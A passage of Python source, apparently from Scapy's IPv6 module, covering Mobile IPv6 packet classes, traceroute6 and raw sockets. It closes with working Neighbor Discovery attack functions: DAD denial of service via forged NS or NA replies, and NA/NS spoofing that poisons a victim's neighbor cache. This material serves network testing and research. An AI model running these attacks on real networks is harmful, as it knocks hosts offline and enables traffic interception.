j = float(x & 0xffffffff) * 2.0**-32
|
res = i + j + delta
|
t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(res))
|
|
return "%s (%d)" % (t, x)
|
|
class MIP6OptReplayProtection(_MIP6OptAlign, Packet): # RFC 4285 (Sect. 6)
|
name = "MIPv6 option - Replay Protection"
|
fields_desc = [ ByteEnumField("otype", 10, _mobopttypes),
|
ByteField("olen", 8),
|
NTPTimestampField("timestamp", 0) ]
|
x = 8 ; y = 2 # alignment requirement: 8n+2
|
|
class MIP6OptCGAParamsReq(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.6)
|
name = "MIPv6 option - CGA Parameters Request"
|
fields_desc = [ ByteEnumField("otype", 11, _mobopttypes),
|
ByteField("olen", 0) ]
|
x = 0 ; y = 0 # alignment requirement: none
|
|
# XXX TODO: deal with CGA param fragmentation and build of defragmented
|
# XXX version. Passing of a big CGAParam structure should be
|
# XXX simplified. Make it hold packets, by the way --arno
|
class MIP6OptCGAParams(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.1)
|
name = "MIPv6 option - CGA Parameters"
|
fields_desc = [ ByteEnumField("otype", 12, _mobopttypes),
|
FieldLenField("olen", None, length_of="cgaparams", fmt="B"),
|
StrLenField("cgaparams", "",
|
length_from = lambda pkt: pkt.olen) ]
|
x = 0 ; y = 0 # alignment requirement: none
|
|
class MIP6OptSignature(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.2)
|
name = "MIPv6 option - Signature"
|
fields_desc = [ ByteEnumField("otype", 13, _mobopttypes),
|
FieldLenField("olen", None, length_of="sig", fmt="B"),
|
StrLenField("sig", "",
|
length_from = lambda pkt: pkt.olen) ]
|
x = 0 ; y = 0 # alignment requirement: none
|
|
class MIP6OptHomeKeygenToken(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.3)
|
name = "MIPv6 option - Home Keygen Token"
|
fields_desc = [ ByteEnumField("otype", 14, _mobopttypes),
|
FieldLenField("olen", None, length_of="hkt", fmt="B"),
|
StrLenField("hkt", "",
|
length_from = lambda pkt: pkt.olen) ]
|
x = 0 ; y = 0 # alignment requirement: none
|
|
class MIP6OptCareOfTestInit(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.4)
|
name = "MIPv6 option - Care-of Test Init"
|
fields_desc = [ ByteEnumField("otype", 15, _mobopttypes),
|
ByteField("olen", 0) ]
|
x = 0 ; y = 0 # alignment requirement: none
|
|
class MIP6OptCareOfTest(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.5)
|
name = "MIPv6 option - Care-of Test"
|
fields_desc = [ ByteEnumField("otype", 16, _mobopttypes),
|
FieldLenField("olen", None, length_of="cokt", fmt="B"),
|
StrLenField("cokt", b'\x00'*8,
|
length_from = lambda pkt: pkt.olen) ]
|
x = 0 ; y = 0 # alignment requirement: none
|
|
class MIP6OptUnknown(_MIP6OptAlign, Packet):
|
name = 'Scapy6 - Unknown Mobility Option'
|
fields_desc = [ ByteEnumField("otype", 6, _mobopttypes),
|
FieldLenField("olen", None, length_of="odata", fmt="B"),
|
StrLenField("odata", "",
|
length_from = lambda pkt: pkt.olen) ]
|
x = 0 ; y = 0 # alignment requirement: none
|
|
moboptcls = { 0: Pad1,
|
1: PadN,
|
2: MIP6OptBRAdvice,
|
3: MIP6OptAltCoA,
|
4: MIP6OptNonceIndices,
|
5: MIP6OptBindingAuthData,
|
6: MIP6OptMobNetPrefix,
|
7: MIP6OptLLAddr,
|
8: MIP6OptMNID,
|
9: MIP6OptMsgAuth,
|
10: MIP6OptReplayProtection,
|
11: MIP6OptCGAParamsReq,
|
12: MIP6OptCGAParams,
|
13: MIP6OptSignature,
|
14: MIP6OptHomeKeygenToken,
|
15: MIP6OptCareOfTestInit,
|
16: MIP6OptCareOfTest }
|
|
|
# Main Mobile IPv6 Classes
|
|
mhtypes = { 0: 'BRR',
|
1: 'HoTI',
|
2: 'CoTI',
|
3: 'HoT',
|
4: 'CoT',
|
5: 'BU',
|
6: 'BA',
|
7: 'BE',
|
8: 'Fast BU',
|
9: 'Fast BA',
|
10: 'Fast NA' }
|
|
# From http://www.iana.org/assignments/mobility-parameters
|
bastatus = { 0: 'Binding Update accepted',
|
1: 'Accepted but prefix discovery necessary',
|
128: 'Reason unspecified',
|
129: 'Administratively prohibited',
|
130: 'Insufficient resources',
|
131: 'Home registration not supported',
|
132: 'Not home subnet',
|
133: 'Not home agent for this mobile node',
|
134: 'Duplicate Address Detection failed',
|
135: 'Sequence number out of window',
|
136: 'Expired home nonce index',
|
137: 'Expired care-of nonce index',
|
138: 'Expired nonces',
|
139: 'Registration type change disallowed',
|
140: 'Mobile Router Operation not permitted',
|
141: 'Invalid Prefix',
|
142: 'Not Authorized for Prefix',
|
143: 'Forwarding Setup failed (prefixes missing)',
|
144: 'MIPV6-ID-MISMATCH',
|
145: 'MIPV6-MESG-ID-REQD',
|
146: 'MIPV6-AUTH-FAIL',
|
147: 'Permanent home keygen token unavailable',
|
148: 'CGA and signature verification failed',
|
149: 'Permanent home keygen token exists',
|
150: 'Non-null home nonce index expected' }
|
|
|
class _MobilityHeader(Packet):
|
name = 'Dummy IPv6 Mobility Header'
|
overload_fields = { IPv6: { "nh": 135 }}
|
|
def post_build(self, p, pay):
|
p += pay
|
l = self.len
|
if self.len is None:
|
l = (len(p)-8)//8
|
p = chb(p[0]) + struct.pack("B", l) + chb(p[2:])
|
if self.cksum is None:
|
cksum = in6_chksum(135, self.underlayer, p)
|
else:
|
cksum = self.cksum
|
p = chb(p[:4])+struct.pack("!H", cksum)+chb(p[6:])
|
return p
|
|
|
class MIP6MH_Generic(_MobilityHeader): # Mainly for decoding of unknown msg
|
name = "IPv6 Mobility Header - Generic Message"
|
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
|
ByteField("len", None),
|
ByteEnumField("mhtype", None, mhtypes),
|
ByteField("res", None),
|
XShortField("cksum", None),
|
StrLenField("msg", b"\x00"*2,
|
length_from = lambda pkt: 8*pkt.len-6) ]
|
|
|
|
# TODO: make a generic _OptionsField
|
class _MobilityOptionsField(PacketListField):
|
__slots__ = ["curpos"]
|
def __init__(self, name, default, cls, curpos, count_from=None, length_from=None):
|
self.curpos = curpos
|
PacketListField.__init__(self, name, default, cls, count_from=count_from, length_from=length_from)
|
|
def getfield(self, pkt, s):
|
l = self.length_from(pkt)
|
return s[l:],self.m2i(pkt, s[:l])
|
|
def i2len(self, pkt, i):
|
return len(self.i2m(pkt, i))
|
|
def m2i(self, pkt, x):
|
opt = []
|
while x:
|
o = orb(x[0]) # Option type
|
cls = self.cls
|
if o in moboptcls:
|
cls = moboptcls[o]
|
try:
|
op = cls(x)
|
except:
|
op = self.cls(x)
|
opt.append(op)
|
if isinstance(op.payload, conf.raw_layer):
|
x = op.payload.load
|
del(op.payload)
|
else:
|
x = b""
|
return opt
|
|
def i2m(self, pkt, x):
|
autopad = None
|
try:
|
autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field
|
except:
|
autopad = 1
|
|
if not autopad:
|
return b"".join(map(str, x))
|
|
curpos = self.curpos
|
s = b""
|
for p in x:
|
d = p.alignment_delta(curpos)
|
curpos += d
|
if d == 1:
|
s += raw(Pad1())
|
elif d != 0:
|
s += raw(PadN(optdata=b'\x00'*(d-2)))
|
pstr = raw(p)
|
curpos += len(pstr)
|
s += pstr
|
|
# Let's make the class including our option field
|
# a multiple of 8 octets long
|
d = curpos % 8
|
if d == 0:
|
return s
|
d = 8 - d
|
if d == 1:
|
s += raw(Pad1())
|
elif d != 0:
|
s += raw(PadN(optdata=b'\x00'*(d-2)))
|
|
return s
|
|
def addfield(self, pkt, s, val):
|
return s+self.i2m(pkt, val)
|
|
class MIP6MH_BRR(_MobilityHeader):
|
name = "IPv6 Mobility Header - Binding Refresh Request"
|
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
|
ByteField("len", None),
|
ByteEnumField("mhtype", 0, mhtypes),
|
ByteField("res", None),
|
XShortField("cksum", None),
|
ShortField("res2", None),
|
_PhantomAutoPadField("autopad", 1), # autopad activated by default
|
_MobilityOptionsField("options", [], MIP6OptUnknown, 8,
|
length_from = lambda pkt: 8*pkt.len) ]
|
overload_fields = { IPv6: { "nh": 135 } }
|
def hashret(self):
|
# Hack: BRR, BU and BA have the same hashret that returns the same
|
# value b"\x00\x08\x09" (concatenation of mhtypes). This is
|
# because we need match BA with BU and BU with BRR. --arno
|
return b"\x00\x08\x09"
|
|
class MIP6MH_HoTI(_MobilityHeader):
|
name = "IPv6 Mobility Header - Home Test Init"
|
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
|
ByteField("len", None),
|
ByteEnumField("mhtype", 1, mhtypes),
|
ByteField("res", None),
|
XShortField("cksum", None),
|
StrFixedLenField("reserved", b"\x00"*2, 2),
|
StrFixedLenField("cookie", b"\x00"*8, 8),
|
_PhantomAutoPadField("autopad", 1), # autopad activated by default
|
_MobilityOptionsField("options", [], MIP6OptUnknown, 16,
|
length_from = lambda pkt: 8*(pkt.len-1)) ]
|
overload_fields = { IPv6: { "nh": 135 } }
|
def hashret(self):
|
return raw(self.cookie)
|
|
class MIP6MH_CoTI(MIP6MH_HoTI):
|
name = "IPv6 Mobility Header - Care-of Test Init"
|
mhtype = 2
|
def hashret(self):
|
return raw(self.cookie)
|
|
class MIP6MH_HoT(_MobilityHeader):
|
name = "IPv6 Mobility Header - Home Test"
|
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
|
ByteField("len", None),
|
ByteEnumField("mhtype", 3, mhtypes),
|
ByteField("res", None),
|
XShortField("cksum", None),
|
ShortField("index", None),
|
StrFixedLenField("cookie", b"\x00"*8, 8),
|
StrFixedLenField("token", b"\x00"*8, 8),
|
_PhantomAutoPadField("autopad", 1), # autopad activated by default
|
_MobilityOptionsField("options", [], MIP6OptUnknown, 24,
|
length_from = lambda pkt: 8*(pkt.len-2)) ]
|
overload_fields = { IPv6: { "nh": 135 } }
|
def hashret(self):
|
return raw(self.cookie)
|
def answers(self, other):
|
if (isinstance(other, MIP6MH_HoTI) and
|
self.cookie == other.cookie):
|
return 1
|
return 0
|
|
class MIP6MH_CoT(MIP6MH_HoT):
|
name = "IPv6 Mobility Header - Care-of Test"
|
mhtype = 4
|
def hashret(self):
|
return raw(self.cookie)
|
|
def answers(self, other):
|
if (isinstance(other, MIP6MH_CoTI) and
|
self.cookie == other.cookie):
|
return 1
|
return 0
|
|
class LifetimeField(ShortField):
|
def i2repr(self, pkt, x):
|
return "%d sec" % (4*x)
|
|
class MIP6MH_BU(_MobilityHeader):
|
name = "IPv6 Mobility Header - Binding Update"
|
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
|
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes)
|
ByteEnumField("mhtype", 5, mhtypes),
|
ByteField("res", None),
|
XShortField("cksum", None),
|
XShortField("seq", None), # TODO: ShortNonceField
|
FlagsField("flags", "KHA", 7, "PRMKLHA"),
|
XBitField("reserved", 0, 9),
|
LifetimeField("mhtime", 3), # unit == 4 seconds
|
_PhantomAutoPadField("autopad", 1), # autopad activated by default
|
_MobilityOptionsField("options", [], MIP6OptUnknown, 12,
|
length_from = lambda pkt: 8*pkt.len - 4) ]
|
overload_fields = { IPv6: { "nh": 135 } }
|
|
def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
|
return b"\x00\x08\x09"
|
|
def answers(self, other):
|
if isinstance(other, MIP6MH_BRR):
|
return 1
|
return 0
|
|
class MIP6MH_BA(_MobilityHeader):
|
name = "IPv6 Mobility Header - Binding ACK"
|
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
|
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes)
|
ByteEnumField("mhtype", 6, mhtypes),
|
ByteField("res", None),
|
XShortField("cksum", None),
|
ByteEnumField("status", 0, bastatus),
|
FlagsField("flags", "K", 3, "PRK"),
|
XBitField("res2", None, 5),
|
XShortField("seq", None), # TODO: ShortNonceField
|
XShortField("mhtime", 0), # unit == 4 seconds
|
_PhantomAutoPadField("autopad", 1), # autopad activated by default
|
_MobilityOptionsField("options", [], MIP6OptUnknown, 12,
|
length_from = lambda pkt: 8*pkt.len-4) ]
|
overload_fields = { IPv6: { "nh": 135 }}
|
|
def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
|
return b"\x00\x08\x09"
|
|
def answers(self, other):
|
if (isinstance(other, MIP6MH_BU) and
|
other.mhtype == 5 and
|
self.mhtype == 6 and
|
other.flags & 0x1 and # Ack request flags is set
|
self.seq == other.seq):
|
return 1
|
return 0
|
|
_bestatus = { 1: 'Unknown binding for Home Address destination option',
|
2: 'Unrecognized MH Type value' }
|
|
# TODO: match Binding Error to its stimulus
|
class MIP6MH_BE(_MobilityHeader):
|
name = "IPv6 Mobility Header - Binding Error"
|
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
|
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes)
|
ByteEnumField("mhtype", 7, mhtypes),
|
ByteField("res", 0),
|
XShortField("cksum", None),
|
ByteEnumField("status", 0, _bestatus),
|
ByteField("reserved", 0),
|
IP6Field("ha", "::"),
|
_MobilityOptionsField("options", [], MIP6OptUnknown, 24,
|
length_from = lambda pkt: 8*(pkt.len-2)) ]
|
overload_fields = { IPv6: { "nh": 135 }}
|
|
_mip6_mhtype2cls = { 0: MIP6MH_BRR,
|
1: MIP6MH_HoTI,
|
2: MIP6MH_CoTI,
|
3: MIP6MH_HoT,
|
4: MIP6MH_CoT,
|
5: MIP6MH_BU,
|
6: MIP6MH_BA,
|
7: MIP6MH_BE }
|
|
|
|
#############################################################################
|
#############################################################################
|
### Traceroute6 ###
|
#############################################################################
|
#############################################################################
|
|
class AS_resolver6(AS_resolver_riswhois):
|
def _resolve_one(self, ip):
|
"""
|
overloaded version to provide a Whois resolution on the
|
embedded IPv4 address if the address is 6to4 or Teredo.
|
Otherwise, the native IPv6 address is passed.
|
"""
|
|
if in6_isaddr6to4(ip): # for 6to4, use embedded @
|
tmp = inet_pton(socket.AF_INET6, ip)
|
addr = inet_ntop(socket.AF_INET, tmp[2:6])
|
elif in6_isaddrTeredo(ip): # for Teredo, use mapped address
|
addr = teredoAddrExtractInfo(ip)[2]
|
else:
|
addr = ip
|
|
_, asn, desc = AS_resolver_riswhois._resolve_one(self, addr)
|
|
if asn.startswith("AS"):
|
try:
|
asn = int(asn[2:])
|
except ValueError:
|
pass
|
|
return ip,asn,desc
|
|
class TracerouteResult6(TracerouteResult):
|
__slots__ = []
|
def show(self):
|
return self.make_table(lambda s_r: (s_r[0].sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"), # TODO: ICMPv6 !
|
s_r[0].hlim,
|
s_r[1].sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}"+
|
"{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}"+
|
"{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}"+
|
"{ICMPv6EchoReply:%ir,type%}")))
|
|
def get_trace(self):
|
trace = {}
|
|
for s,r in self.res:
|
if IPv6 not in s:
|
continue
|
d = s[IPv6].dst
|
if d not in trace:
|
trace[d] = {}
|
|
t = not (ICMPv6TimeExceeded in r or
|
ICMPv6DestUnreach in r or
|
ICMPv6PacketTooBig in r or
|
ICMPv6ParamProblem in r)
|
|
trace[d][s[IPv6].hlim] = r[IPv6].src, t
|
|
for k in six.itervalues(trace):
|
try:
|
m = min(x for x, y in six.itervalues(k) if y)
|
except ValueError:
|
continue
|
for l in list(k): # use list(): k is modified in the loop
|
if l > m:
|
del k[l]
|
|
return trace
|
|
def graph(self, ASres=AS_resolver6(), **kargs):
|
TracerouteResult.graph(self, ASres=ASres, **kargs)
|
|
@conf.commands.register
|
def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(),
|
l4 = None, timeout=2, verbose=None, **kargs):
|
"""Instant TCP traceroute using IPv6
|
traceroute6(target, [maxttl=30], [dport=80], [sport=80]) -> None
|
"""
|
if verbose is None:
|
verbose = conf.verb
|
|
if l4 is None:
|
a,b = sr(IPv6(dst=target, hlim=(minttl,maxttl))/TCP(seq=RandInt(),sport=sport, dport=dport),
|
timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs)
|
else:
|
a,b = sr(IPv6(dst=target, hlim=(minttl,maxttl))/l4,
|
timeout=timeout, verbose=verbose, **kargs)
|
|
a = TracerouteResult6(a.res)
|
|
if verbose:
|
a.display()
|
|
return a,b
|
|
#############################################################################
|
#############################################################################
|
### Sockets ###
|
#############################################################################
|
#############################################################################
|
|
class L3RawSocket6(L3RawSocket):
|
def __init__(self, type = ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0):
|
L3RawSocket.__init__(self, type, filter, iface, promisc)
|
# NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292)
|
self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW)
|
self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type))
|
|
def IPv6inIP(dst='203.178.135.36', src=None):
|
_IPv6inIP.dst = dst
|
_IPv6inIP.src = src
|
if not conf.L3socket == _IPv6inIP:
|
_IPv6inIP.cls = conf.L3socket
|
else:
|
del(conf.L3socket)
|
return _IPv6inIP
|
|
class _IPv6inIP(SuperSocket):
|
dst = '127.0.0.1'
|
src = None
|
cls = None
|
|
def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args):
|
SuperSocket.__init__(self, family, type, proto)
|
self.worker = self.cls(**args)
|
|
def set(self, dst, src=None):
|
_IPv6inIP.src = src
|
_IPv6inIP.dst = dst
|
|
def nonblock_recv(self):
|
p = self.worker.nonblock_recv()
|
return self._recv(p)
|
|
def recv(self, x):
|
p = self.worker.recv(x)
|
return self._recv(p, x)
|
|
def _recv(self, p, x=MTU):
|
if p is None:
|
return p
|
elif isinstance(p, IP):
|
# TODO: verify checksum
|
if p.src == self.dst and p.proto == socket.IPPROTO_IPV6:
|
if isinstance(p.payload, IPv6):
|
return p.payload
|
return p
|
|
def send(self, x):
|
return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6)/x)
|
|
|
#############################################################################
|
#############################################################################
|
### Neighbor Discovery Protocol Attacks ###
|
#############################################################################
|
#############################################################################
|
|
def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None,
|
tgt_filter=None, reply_mac=None):
|
"""
|
Internal generic helper accepting a specific callback as first argument,
|
for NS or NA reply. See the two specific functions below.
|
"""
|
|
def is_request(req, mac_src_filter, tgt_filter):
|
"""
|
Check if packet req is a request
|
"""
|
|
# Those simple checks are based on Section 5.4.2 of RFC 4862
|
if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
|
return 0
|
|
# Get and compare the MAC address
|
mac_src = req[Ether].src
|
if mac_src_filter and mac_src != mac_src_filter:
|
return 0
|
|
# Source must be the unspecified address
|
if req[IPv6].src != "::":
|
return 0
|
|
# Check destination is the link-local solicited-node multicast
|
# address associated with target address in received NS
|
tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
|
if tgt_filter and tgt != tgt_filter:
|
return 0
|
received_snma = inet_pton(socket.AF_INET6, req[IPv6].dst)
|
expected_snma = in6_getnsma(tgt)
|
if received_snma != expected_snma:
|
return 0
|
|
return 1
|
|
if not iface:
|
iface = conf.iface
|
|
# To prevent sniffing our own traffic
|
if not reply_mac:
|
reply_mac = get_if_hwaddr(iface)
|
sniff_filter = "icmp6 and not ether src %s" % reply_mac
|
|
sniff(store=0,
|
filter=sniff_filter,
|
lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
|
prn=lambda x: reply_callback(x, reply_mac, iface),
|
iface=iface)
|
|
|
def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None,
|
reply_mac=None):
|
"""
|
Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
|
3756. This is done by listening incoming NS messages sent from the
|
unspecified address and sending a NS reply for the target address,
|
leading the peer to believe that another node is also performing DAD
|
for that address.
|
|
By default, the fake NS sent to create the DoS uses:
|
- as target address the target address found in received NS.
|
- as IPv6 source address: the unspecified address (::).
|
- as IPv6 destination address: the link-local solicited-node multicast
|
address derived from the target address in received NS.
|
- the mac address of the interface as source (or reply_mac, see below).
|
- the multicast mac address derived from the solicited node multicast
|
address used as IPv6 destination address.
|
|
Following arguments can be used to change the behavior:
|
|
iface: a specific interface (e.g. "eth0") of the system on which the
|
DoS should be launched. If None is provided conf.iface is used.
|
|
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
|
Only NS messages received from this source will trigger replies.
|
This allows limiting the effects of the DoS to a single target by
|
filtering on its mac address. The default value is None: the DoS
|
is not limited to a specific mac address.
|
|
tgt_filter: Same as previous but for a specific target IPv6 address for
|
received NS. If the target address in the NS message (not the IPv6
|
destination address) matches that address, then a fake reply will
|
be sent, i.e. the emitter will be a target of the DoS.
|
|
reply_mac: allow specifying a specific source mac address for the reply,
|
i.e. to prevent the use of the mac address of the interface.
|
"""
|
|
def ns_reply_callback(req, reply_mac, iface):
|
"""
|
Callback that reply to a NS by sending a similar NS
|
"""
|
|
# Let's build a reply and send it
|
mac = req[Ether].src
|
dst = req[IPv6].dst
|
tgt = req[ICMPv6ND_NS].tgt
|
rep = Ether(src=reply_mac)/IPv6(src="::", dst=dst)/ICMPv6ND_NS(tgt=tgt)
|
sendp(rep, iface=iface, verbose=0)
|
|
print("Reply NS for target address %s (received from %s)" % (tgt, mac))
|
|
_NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter,
|
tgt_filter, reply_mac)
|
|
|
def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None,
|
reply_mac=None):
|
"""
|
Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
|
3756. This is done by listening incoming NS messages *sent from the
|
unspecified address* and sending a NA reply for the target address,
|
leading the peer to believe that another node is also performing DAD
|
for that address.
|
|
By default, the fake NA sent to create the DoS uses:
|
- as target address the target address found in received NS.
|
- as IPv6 source address: the target address found in received NS.
|
- as IPv6 destination address: the link-local solicited-node multicast
|
address derived from the target address in received NS.
|
- the mac address of the interface as source (or reply_mac, see below).
|
- the multicast mac address derived from the solicited node multicast
|
address used as IPv6 destination address.
|
- A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled
|
with the mac address used as source of the NA.
|
|
Following arguments can be used to change the behavior:
|
|
iface: a specific interface (e.g. "eth0") of the system on which the
|
DoS should be launched. If None is provided conf.iface is used.
|
|
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
|
Only NS messages received from this source will trigger replies.
|
This allows limiting the effects of the DoS to a single target by
|
filtering on its mac address. The default value is None: the DoS
|
is not limited to a specific mac address.
|
|
tgt_filter: Same as previous but for a specific target IPv6 address for
|
received NS. If the target address in the NS message (not the IPv6
|
destination address) matches that address, then a fake reply will
|
be sent, i.e. the emitter will be a target of the DoS.
|
|
reply_mac: allow specifying a specific source mac address for the reply,
|
i.e. to prevent the use of the mac address of the interface. This
|
address will also be used in the Target Link-Layer Address option.
|
"""
|
|
def na_reply_callback(req, reply_mac, iface):
|
"""
|
Callback that reply to a NS with a NA
|
"""
|
|
# Let's build a reply and send it
|
mac = req[Ether].src
|
dst = req[IPv6].dst
|
tgt = req[ICMPv6ND_NS].tgt
|
rep = Ether(src=reply_mac)/IPv6(src=tgt, dst=dst)
|
rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1)
|
rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
|
sendp(rep, iface=iface, verbose=0)
|
|
print("Reply NA for target address %s (received from %s)" % (tgt, mac))
|
|
_NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter,
|
tgt_filter, reply_mac)
|
|
|
def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None,
|
reply_mac=None, router=False):
|
"""
|
The main purpose of this function is to send fake Neighbor Advertisement
|
messages to a victim. As the emission of unsolicited Neighbor Advertisement
|
is pretty pointless (from an attacker standpoint) because it will not
|
lead to a modification of a victim's neighbor cache, the function send
|
advertisements in response to received NS (NS sent as part of the DAD,
|
i.e. with an unspecified address as source, are not considered).
|
|
By default, the fake NA sent to create the DoS uses:
|
- as target address the target address found in received NS.
|
- as IPv6 source address: the target address
|
- as IPv6 destination address: the source IPv6 address of received NS
|
message.
|
- the mac address of the interface as source (or reply_mac, see below).
|
- the source mac address of the received NS as destination macs address
|
of the emitted NA.
|
- A Target Link-Layer address option (ICMPv6NDOptDstLLAddr)
|
filled with the mac address used as source of the NA.
|
|
Following arguments can be used to change the behavior:
|
|
iface: a specific interface (e.g. "eth0") of the system on which the
|
DoS should be launched. If None is provided conf.iface is used.
|
|
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
|
Only NS messages received from this source will trigger replies.
|
This allows limiting the effects of the DoS to a single target by
|
filtering on its mac address. The default value is None: the DoS
|
is not limited to a specific mac address.
|
|
tgt_filter: Same as previous but for a specific target IPv6 address for
|
received NS. If the target address in the NS message (not the IPv6
|
destination address) matches that address, then a fake reply will
|
be sent, i.e. the emitter will be a target of the DoS.
|
|
reply_mac: allow specifying a specific source mac address for the reply,
|
i.e. to prevent the use of the mac address of the interface. This
|
address will also be used in the Target Link-Layer Address option.
|
|
router: by the default (False) the 'R' flag in the NA used for the reply
|
is not set. If the parameter is set to True, the 'R' flag in the
|
NA is set, advertising us as a router.
|
|
Please, keep the following in mind when using the function: for obvious
|
reasons (kernel space vs. Python speed), when the target of the address
|
resolution is on the link, the sender of the NS receives 2 NA messages
|
in a row, the valid one and our fake one. The second one will overwrite
|
the information provided by the first one, i.e. the natural latency of
|
Scapy helps here.
|
|
In practice, on a common Ethernet link, the emission of the NA from the
|
genuine target (kernel stack) usually occurs in the same millisecond as
|
the receipt of the NS. The NA generated by Scapy6 will usually come after
|
something 20+ ms. On a usual testbed for instance, this difference is
|
sufficient to have the first data packet sent from the victim to the
|
destination before it even receives our fake NA.
|
"""
|
|
def is_request(req, mac_src_filter, tgt_filter):
|
"""
|
Check if packet req is a request
|
"""
|
|
# Those simple checks are based on Section 5.4.2 of RFC 4862
|
if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
|
return 0
|
|
mac_src = req[Ether].src
|
if mac_src_filter and mac_src != mac_src_filter:
|
return 0
|
|
# Source must NOT be the unspecified address
|
if req[IPv6].src == "::":
|
return 0
|
|
tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
|
if tgt_filter and tgt != tgt_filter:
|
return 0
|
|
dst = req[IPv6].dst
|
if in6_isllsnmaddr(dst): # Address is Link Layer Solicited Node mcast.
|
|
# If this is a real address resolution NS, then the destination
|
# address of the packet is the link-local solicited node multicast
|
# address associated with the target of the NS.
|
# Otherwise, the NS is a NUD related one, i.e. the peer is
|
# unicasting the NS to check the target is still alive (L2
|
# information is still in its cache and it is verified)
|
received_snma = socket.inet_pton(socket.AF_INET6, dst)
|
expected_snma = in6_getnsma(tgt)
|
if received_snma != expected_snma:
|
print("solicited node multicast @ does not match target @!")
|
return 0
|
|
return 1
|
|
def reply_callback(req, reply_mac, router, iface):
|
"""
|
Callback that reply to a NS with a spoofed NA
|
"""
|
|
# Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and
|
# send it back.
|
mac = req[Ether].src
|
pkt = req[IPv6]
|
src = pkt.src
|
tgt = req[ICMPv6ND_NS].tgt
|
rep = Ether(src=reply_mac, dst=mac)/IPv6(src=tgt, dst=src)
|
rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1) # target from the NS
|
|
# "If the solicitation IP Destination Address is not a multicast
|
# address, the Target Link-Layer Address option MAY be omitted"
|
# Given our purpose, we always include it.
|
rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
|
|
sendp(rep, iface=iface, verbose=0)
|
|
print("Reply NA for target address %s (received from %s)" % (tgt, mac))
|
|
if not iface:
|
iface = conf.iface
|
# To prevent sniffing our own traffic
|
if not reply_mac:
|
reply_mac = get_if_hwaddr(iface)
|
sniff_filter = "icmp6 and not ether src %s" % reply_mac
|
|
router = (router and 1) or 0 # Value of the R flags in NA
|
|
sniff(store=0,
|
filter=sniff_filter,
|
lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
|
prn=lambda x: reply_callback(x, reply_mac, router, iface),
|
iface=iface)
|
|
|
def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1",
|
dst=None, src_mac=None, dst_mac=None, loop=True,
|
inter=1, iface=None):
|
"""
|
The main purpose of this function is to send fake Neighbor Solicitations
|
messages to a victim, in order to either create a new entry in its neighbor
|
cache or update an existing one. In section 7.2.3 of RFC 4861, it is stated
|
that a node SHOULD create the entry or update an existing one (if it is not
|
currently performing DAD for the target of the NS). The entry's reachability
|
state is set to STALE.
|
|
The two main parameters of the function are the source link-layer address
|
(carried by the Source Link-Layer Address option in the NS) and the
|
source address of the packet.
|
|
Unlike some other NDP_Attack_* function, this one is not based on a
|
stimulus/response model. When called, it sends the same NS packet in loop
|
every second (the default)
|
|
Following arguments can be used to change the format of the packets:
|
|
src_lladdr: the MAC address used in the Source Link-Layer Address option
|
included in the NS packet. This is the address that the peer should
|
associate in its neighbor cache with the IPv6 source address of the
|
packet. If None is provided, the mac address of the interface is
|
used.
|
|
src: the IPv6 address used as source of the packet. If None is provided,
|
